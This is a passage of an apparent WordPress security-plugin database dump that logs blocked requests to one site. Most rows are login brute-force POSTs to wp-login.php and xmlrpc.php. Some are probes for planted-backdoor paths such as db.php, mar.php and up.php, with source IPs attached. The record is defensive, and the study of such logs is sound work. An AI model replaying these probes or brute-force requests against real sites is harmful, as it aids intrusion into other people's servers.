Safari\\/537.36\"}','8nwZAO41jWSaB36iURQFICPJ',0,1666209186.3167,17645,'','POST',403,0,600,0,1,'',0),('23.97.205.210',392285650,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','jvP1LYn2Uye5mgSRtzN3rWis',0,1666207345.5482,17827,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','z5lkr0Eo8iyx4HuGFOPw3Itc',0,1666212887.5773,17878,'','POST',403,0,600,0,1,'',0),('20.172.66.23',346833431,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"\"}','I19Tvd0hc6myazSr7bwjFVkN',0,1666210403.1096,11437,'','GET',403,0,700,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','8dSpnmj029WUCTGIQZXJsMxF',0,1666211040.9043,17570,'','POST',403,0,600,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','VkYBXHDcTgjwnaFehl6fMuPE',0,1666214745.1453,19566,'','POST',403,0,600,0,1,'',0),('157.230.44.8',2649107464,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','y3VaD0jp24NkIqeXrMnJW5iH',0,1666216602.4348,17271,'','POST',403,0,600,0,1,'',0),('185.2.4.56',3103917112,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','nFcwNlhBDdxZE5VIU7YC2rWp',0,1666220268.9219,17386,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko\\/20100101 Firefox\\/29.0\"}','Eu2vXDgC6cyUtQM50HJ4ndBF',0,1666219787.2023,1259,'','POST',403,0,600,0,1,'',0),('103.130.219.13',1736629005,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','ZB9r1JQXELfl4t5AKV7dhjDc',0,1666218438.2514,18012,'','POST',403,0,600,0,1,'',0),('46.105.29.21',778640661,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','y5v6DAHsmFC0B4Eb1MPXe3q8',0,1666223942.7846,17352,'','POST',403,0,600,0,1,'',0),('47.111.116.44',795833388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','zhRoL3v7igjbZ8MxedKkm1JC',0,1666222106.4370,17179,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','NewBSuatzrDW7g8Cm50Ajsov',0,1666223113.6115,1550,'','POST',403,0,600,0,1,'',0),('103.166.183.192',1738979264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','wEe2PgTYiUrFN0qnmJ571ApH',0,1666229517.3576,18048,'','POST',403,0,600,0,1,'',0),('137.184.124.136',2310569096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','63RsEYxw0fNqeWZjmMFi5Jzh',0,1666231376.4052,18960,'','POST',403,0,600,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','pJGTMeZraHjwP2vC3onyRxBq',0,1666225792.8555,19157,'','POST',403,0,600,0,1,'',0),('47.105.73.13',795429133,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','1Sdpm5ZcxuLwWFBbkVjzTioY',0,1666227655.3850,1421,'','POST',403,0,600,0,1,'',0),('89.248.165.195',1509467587,'','https://cteisys.com/wp-login.php','','{\"1\":\"fasthttp\"}','rA073zwncWKJgIS6MymY8tGb',0,1666238103.0775,1023,'','POST',403,0,600,0,1,'',0),('89.248.165.195',1509467587,'','https://cteisys.com/wp-login.php','','{\"1\":\"fasthttp\"}','E7AK4stGDwvPy2WL3OSxQ80m',0,1666238098.1829,468,'','POST',403,0,600,0,1,'',0),('157.230.44.8',2649107464,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','9A2TDMP1wbfYnoKVCXLOsadh',0,1666235211.1969,17925,'','POST',403,0,600,0,1,'',0),('27.72.145.33',457740577,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','2gBHy3oVLviQFnXfADZs5Ex0',0,1666237108.6876,1197,'','POST',403,0,600,0,1,'',0),('143.110.176.116',2406396020,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dzOHbunX0187etZTDK2LFJMQ',0,1666245494.7829,18724,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','tRPFSVpdvT5fozjWscJk4wLH',0,1666244510.1024,18451,'','POST',403,0,600,0,1,'',0),('150.109.148.216',2523763928,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','vprK8Rlzut9Z7GkHS45f6P0n',0,1666242683.1027,17939,'','POST',403,0,600,0,1,'',0),('68.183.75.82',1152863058,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','vbVXfOqITmoR3aHsElSeCMn1',0,1666263485.5717,1312,'','POST',403,0,600,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d9Nz3FCKsrOufp7ZXEyRknTQ',0,1666263238.3326,18383,'','POST',403,0,515,0,1,'',0),('51.89.119.182',861501366,'','https://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','xX1qdw0SkCZMlQ8InfLU734y',0,1666263115.8583,274,'','GET',403,0,700,0,1,'',0),('51.89.119.182',861501366,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wlO08qhKTInuNZWHXkRzQU9v',0,1666263110.5729,297,'','GET',403,0,700,0,1,'',0),('141.95.89.75',2371836235,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5rh7OpyUoTHsda0cmXVA8NLG',0,1666249009.8728,15100,'','POST',403,0,515,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','GmlSp6kgi1s7tn03OfQDzrCe',0,1666248192.9653,17590,'','POST',403,0,600,0,1,'',0),('185.104.44.58',3110612026,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c5il2ZYCgOdIXoTnbLf87Ewx',0,1666247930.5319,18592,'','POST',403,0,515,0,1,'',0),('81.88.52.210',1364735186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NFl7HEomSjVwiy6ZAr9Xgseu',0,1666246911.0457,19313,'','POST',403,0,515,0,1,'',0),('104.243.26.114',1760762482,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oLEK5ND1AQysdrqhUfSMmbGn',0,1666247390.4773,19874,'','POST',403,0,515,0,1,'',0),('103.204.128.101',1741455461,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1OaTtLuvkYigPUKRz02noy89',0,1666245941.7540,2867,'','POST',403,0,515,0,1,'',0),('120.27.133.69',2015069509,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','p2ZLFGmaBN8dhbMTPnliy45J',0,1666246339.4014,18097,'','POST',403,0,600,0,1,'',0),('51.89.119.182',861501366,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','skzxOciAJTRM2tHaVhqFjw4r',0,1666263104.9290,304,'','GET',403,0,700,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','0najdLCYvybKolN9gmXwUJzh',0,1666262572.7948,8476,'','POST',403,0,515,0,1,'',0),('51.89.119.182',861501366,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','zEPst0mDZ4IY6oJ1KGra3ef2',0,1666263087.7970,11676,'','GET',403,0,700,0,1,'',0),('118.24.106.172',1981311660,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','Qf1FANPSbqM8TovRlxEiZwnr',0,1666259628.3537,17716,'','POST',403,0,600,0,1,'',0),('114.132.250.235',1921317611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oaj0cLFwlU1WNDtd5h7iRgpQ',0,1666259231.9753,19539,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yvXAkpGPoaYV5iUl2He4K3rB',0,1666251818.7266,18707,'','POST',403,0,515,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','49rsS2HJhel5kNnmXLoMEKCi',0,1666251954.9177,1998,'','POST',403,0,600,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YKWfmpuCTkJXGqRxcyL1Vseb',0,1666251230.9835,18937,'','POST',403,0,515,0,1,'',0),('185.76.77.160',3108785568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6x8uy7YTPngvjMhLSoZ0fF9d',0,1666250670.6488,18867,'','POST',403,0,515,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','0t769jlT1oXxISwE85UgybBK',0,1666250079.5847,17756,'','POST',403,0,600,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bXcnLHW7Nw2tqOQvCKMhYlzg',0,1666249547.3475,13145,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','https://cteisys.com/license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','bTwOuhp5DmtliWQXz9ysd6fa',0,1666259022.1279,420,'','GET',403,0,700,0,1,'',0),('188.166.61.228',3165011428,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','dTtOcs5JnerKulvG1RXxDBS8',0,1666255728.1755,9174,'','POST',403,0,600,0,1,'',0),('103.98.152.12',1734514700,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hIaO8WjZoubd0DP3gmxRNMr7',0,1666255426.4178,2416,'','POST',403,0,515,0,1,'',0),('195.93.152.83',3277690963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DhfJ8qN7CGOa6BoPQc5bmHAd',0,1666254836.1193,18831,'','POST',403,0,515,0,1,'',0),('159.89.199.237',2673461229,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','bNZYPGC1Rrp20gO3zdUwXDEt',0,1666253845.2285,11026,'','POST',403,0,600,0,1,'',0),('103.171.181.53',1739306293,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2VdNeP0JrYsjLm9Eio6CfbTz',0,1666253568.3374,18290,'','POST',403,0,515,0,1,'',0),('123.31.41.38',2065639718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ONQcnSsLiAMuDbaflG7poRCF',0,1666252966.9305,2372,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','bg9RBA6o2eQTswMu7YpiDzhK',0,1666259013.9383,333,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','https://cteisys.com/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','YBHvsED17Rd9ebIPMamfLWC2',0,1666259011.6978,287,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ZjrMCUt3cxXiA745Ys1SeVdm',0,1666258996.7952,11978,'','GET',403,0,700,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AVR7wGrJHcdkKsxibleg2fXt',0,1666258584.6163,18962,'','POST',403,0,515,0,1,'',0),('146.59.243.31',2453402399,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','F4mIgQDxt7izKJfBEp0Hk8co',0,1666258193.4240,11583,'','GET',403,0,700,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JhMy3urxsO4kHwdqNZTDpmei',0,1666257961.4997,18354,'','POST',403,0,515,0,1,'',0),('143.244.155.35',2415172387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','6Gvs8Ol7eTF2XWxw3fjLCS95',0,1666257666.9264,484,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','I8qz0ReNiCrtFsXjbgO7AWBP',0,1666257646.8323,1294,'','POST',403,0,600,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yug4lao35CeKx1LOF2I7ZnsH',0,1666256682.7103,19378,'','POST',403,0,515,0,1,'',0),('141.95.104.232',2371840232,'','https://cteisys.com/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vocPudZ7R8MA4kNTaS3mQjH6',0,1666262371.8921,292,'','GET',403,0,700,0,1,'',0),('141.95.104.232',2371840232,'','http://cteisys.com/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','ULa54Eo69YpgDOSXcyW82jne',0,1666262365.4693,318,'','GET',403,0,700,0,1,'',0),('141.95.104.232',2371840232,'','https://cteisys.com/wp-content/plugins/ppus/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','47QjeG6FSJpfzqoWB5E2PKhm',0,1666262349.0910,306,'','GET',403,0,700,0,1,'',0),('141.95.104.232',2371840232,'','http://cteisys.com/wp-content/plugins/ppus/up.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NhUcCXWy3BAOvuHxzoalZp2r',0,1666262321.8513,11476,'','GET',403,0,700,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OVeq9zUB41KjrXIPJyf8nEhi',0,1666261900.2710,20173,'','POST',403,0,515,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','uZcFisWRtT87UjG0PwELg6mJ',0,1666261573.5765,17819,'','POST',403,0,600,0,1,'',0),('85.31.46.140',1428106892,'','https://cteisys.com/V5.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qt8X5nUYA431gjoOLzDvMT7s',0,1666261441.2861,284,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/V5.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NqCuyxKpvrEnjgVDOGZ75bMt',0,1666261435.2119,332,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','https://cteisys.com/wp-info.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','dG3R1pJH2yA5Vohzmb9BYFqL',0,1666261432.9472,299,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-info.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','pqG6y7oTQRHriIel8jAhNMzL',0,1666261416.5611,7215,'','GET',403,0,700,0,1,'',0),('185.76.77.160',3108785568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0oxXgyVplGcHM49NufbYKIAD',0,1666261231.2313,20223,'','POST',403,0,515,0,1,'',0),('51.159.105.232',866085352,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','O02YCnqgiRQXmvBF6hkcAx8l',0,1666264531.6986,19461,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nVYOD0IjUKE7kWdXvL8zmhP6',0,1666265221.6256,18416,'','POST',403,0,515,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZyorMktUCXA2L6bnIKRjfmD0',0,1666270224.9893,569,'','POST',403,0,600,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tHXQRxzGFyLPvO6edo8IAEp3',0,1666269002.1513,1882,'','POST',403,0,600,0,1,'',0),('46.32.228.70',773907526,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','rq1CM4ygxp9bBaSVdklzcs7U',0,1666267310.0198,17559,'','POST',403,0,600,0,1,'',0),('94.231.86.20',1592219156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','JqyUs9XoVHcl3Ttm1YkrCpQx',0,1666271191.3042,18066,'','POST',403,0,600,0,1,'',0),('128.199.14.4',2160528900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','nBTdAYQsX3k9laH2pbGz65DU',0,1666277043.4133,18750,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','9PMpZsam2Exz7UA0wRFJoeHu',0,1666275094.9135,17860,'','POST',403,0,600,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','KsDwVZBbAEFmSQTOqi8kGMlr',0,1666280962.9817,19116,'','POST',403,0,600,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','dHMDt10WlyaXQ7Kj6UrseLZm',0,1666279026.4293,18459,'','POST',403,0,600,0,1,'',0),('159.89.199.237',2673461229,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 